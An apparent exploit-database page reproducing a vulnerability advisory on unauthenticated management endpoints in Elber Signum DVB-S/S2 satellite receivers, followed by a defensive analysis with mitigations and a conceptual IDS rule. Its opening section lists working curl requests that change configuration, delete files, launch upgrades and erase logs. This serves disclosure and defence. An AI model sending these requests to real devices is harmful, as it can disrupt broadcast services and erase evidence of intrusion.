Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Shell Published Date: 2024-05-04

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Device Config


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.999 Revision 1243
                  1.317 Revision 602
                  1.220 Revision 1250
                  1.220 Revision 1248_1249
                  1.220 Revision 597
                  1.217 Revision 1242
                  1.214 Revision 1023
                  1.193 Revision 924
                  1.175 Revision 873
                  1.166 Revision 550

Summary: The SIGNUM controller from Elber satellite equipment demodulates
one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving
256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned
and configured in 1+1 seamless switching for redundancy. Redundancy can also
be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II
audio codec, providing analog and digital outputs; moreover, it’s possible
to set a data PID to be decoded and passed to the internal RDS encoder,
generating the dual MPX FM output.

Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5815
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5815.php


18.08.2023

--


# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()

# Etc.

Elber Signum DVB‑S/S2 IRD (1.999 and prior) — Device Configuration Disclosure

Executive summary

Elber Signum DVB‑S/S2 IRD devices (used in radio broadcast and satellite reception) were found to expose unauthenticated configuration endpoints and client‑side hidden functionality. A remote, unauthenticated HTTP interface allowed attackers to change device configuration, erase logs, launch upgrades, delete files, and manipulate receiver parameters. This disclosure affects multiple firmware revisions including 1.999 (Revision 1243) and several earlier builds.

Why this matters

Unauthenticated remote configuration means an attacker on the network (or via an exposed management interface) can alter broadcast settings, disrupt services, or persist malicious configuration.
Hidden client functionality disclosed in web assets increases the attack surface — features intended for internal or developer use can be invoked remotely.
Operational impact ranges from service interruption (loss of RF/MPX outputs, muted streams) to supply chain concerns if upgrades or files can be pushed without authentication.

Affected products and versions

Vendor	Product	Affected versions
Elber S.r.l.	SIGNUM DVB‑S/S2 IRD for Radio Networks	1.999 Revision 1243; 1.317 Rev 602; 1.220 Revs 1250/1248_1249/597; 1.217 Rev 1242; 1.214 Rev 1023; 1.193 Rev 924; 1.175 Rev 873; 1.166 Rev 550

Technical description

The device web server exposes a set of JSON/HTTP endpoints that accept GET requests with configuration parameters. Several of these endpoints do not require authentication and perform privileged operations: applying configuration, deleting config files, erasing logs, launching firmware upgrades, and setting radio/MPX/RDS parameters. In addition, client‑side code (console functions) reveals extra functionality intended for factory or development usage.

Typical classes of sensitive actions exposed:

File operations (delete files in configuration storage)
Firmware/upgrade initiation
Log management (erase logs for a time range)
Fine‑grained RF/audio parameter configuration (mute, gains, RDS settings, etc.)

Example (sanitized) request patterns

Below are sanitized examples showing the kinds of HTTP requests that invoke privileged actions. Do not run these against systems you do not own or manage. Use them only as a reference when assessing your own devices.

GET http://DEVICE_IP/json_data/conf_cmd?index=&cmd=
GET http://DEVICE_IP/json_data/erase_log.js?until=
GET http://DEVICE_IP/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=
GET http://DEVICE_IP/json_data/NBFMV2RX.setConfig?

What these patterns demonstrate:

Operations are performed via simple HTTP GET requests with query parameters.
The endpoints accept complex parameter sets (e.g., many RX configuration options) and return success messages.
There is no enforced authentication on the endpoints analyzed, so requests from any host with network access to the device will be accepted.

Observed responses (examples)

“Configuration applied” — when parameters are accepted
“File delete successfully” — when delete commands succeed
“Upgrade launched Successfully” — device accepted firmware update command
“Logs erased” — log deletion accepted

Impact scenarios and risks

Service disruption — attackers can mute outputs, change carrier/RDS/MPX parameters, or stop streams.
Supply chain / firmware risk — unauthenticated upgrade launch could be used to push unauthorized firmware if file upload mechanisms are exploitable.
Evidence removal — erasing logs can hinder incident response and conceal intrusion activity.
Data exposure — configuration dumps or internal flags revealed through client code can expose sensitive network or operational data.

Detection and monitoring

Administrators can use network and host‑based controls to detect suspicious requests against the device management endpoints. Suggested detection approaches:

Network IDS/egress monitoring for HTTP requests with URIs containing known management paths (e.g., "json_data" and operation names like "conf_cmd", "erase_log.js").
Host logs (web server/access logs) showing unauthenticated requests that result in success messages — correlate source IPs and times.
Integrity monitoring of configuration files — alert on unexpected changes or deletions.

Example IDS signature (concept)

Below is a conceptual IDS rule pattern to detect requests aimed at the exposed configuration endpoints. Adapt to your environment and test before deployment.

# Conceptual signature: alert on HTTP GETs to known JSON management endpoints
alert http any any -> $HOME_NET any (msg:"Elber Signum - config endpoint access"; flow:established,to_server; uricontent:"/json_data/"; pcre:"/\/json_data\/(conf_cmd|erase_log|fan|NBFMV2RX.setConfig)/"; sid:1000001; rev:1;)

Explanation: This Suricata/Snort‑style rule looks for HTTP requests containing "/json_data/" followed by specific management actions. Tune for false positives and add source IP whitelists for legitimate management stations.

Mitigations and recommended actions

If you operate affected devices, prioritize the following mitigation steps:

Immediate: Isolate the device from untrusted networks. Restrict management access to a secure management VLAN or VPN and enforce firewall ACLs so only authorized hosts can reach the web interface.
Configuration: Disable remote management if not required. If the web interface must remain enabled, restrict it to HTTPS, ensure authentication is enabled and strong credentials are used, and limit access by IP.
Monitoring: Enable and forward device logs to a central SIEM and monitor for the success messages noted above; enable integrity checks for configuration files.
Compensating controls: Deploy web application firewall (WAF) rules to block or challenge suspicious requests to management paths; use network segmentation to separate broadcast infrastructure from general IT networks.
Patch: Check with the vendor (Elber) for firmware updates that address unauthenticated control and apply vendor‑supplied patches as soon as they are available.
Operational: Rotate administrative credentials and audit all recent configuration changes and firmware operations for signs of unauthorized activity.

Responsible testing guidance

Only test devices that you own or for which you have explicit written authorization. When validating a device for this issue:

Perform tests from an isolated management network or a lab environment.
Use read‑only queries where possible and avoid live destructive actions (file delete, erase logs, or upgrades) unless permitted and required for remediation validation.
Record all testing steps and notify stakeholders before and after tests.

Vendor contact and disclosure

This issue was publicly documented in a vulnerability advisory. Administrators should consult vendor resources and support channels for firmware updates and mitigation guidance. Keep a record of the firmware version and revision identifiers when contacting the vendor to expedite remediation.

References and further reading

Public advisory detailing the findings (reported by security researchers): ZeroScience advisory covering the Elber SIGNUM device vulnerability.
General hardening guidance for embedded network appliances and broadcast infrastructure — focus on network segmentation, authentication, and monitoring.

Summary and takeaways

The Elber Signum IRD devices examined were vulnerable due to unauthenticated management endpoints and exposed client‑side functions. The risk is operationally significant for broadcast systems where continuity and signal integrity are critical. Administrators should immediately restrict access to affected devices, monitor for suspicious activity, apply vendor patches when available, and implement long‑term controls (authentication, segmentation, and monitoring) to reduce the attack surface.